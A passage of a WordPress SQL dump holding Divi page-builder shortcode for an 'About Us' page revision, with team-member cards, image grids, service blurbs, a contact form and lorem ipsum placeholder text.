animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#fcd21d\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 19:13:07','2020-08-04 19:13:07','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(410,1,'2020-08-04 19:15:02','2020-08-04 19:15:02','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 